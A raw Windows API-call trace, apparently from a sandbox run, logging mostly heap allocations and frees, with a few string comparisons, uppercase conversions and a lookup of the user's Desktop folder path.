[0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0102.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.571] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.571] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.572] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0102.572] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0102.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0102.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0102.572] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.572] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75420 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0102.574] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0102.574] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa64c0 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa64c0 | out: hHeap=0x2af0000) returned 1 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0102.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0102.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0102.576] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0102.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0102.576] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0102.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0102.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0102.577] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0102.578] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0102.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 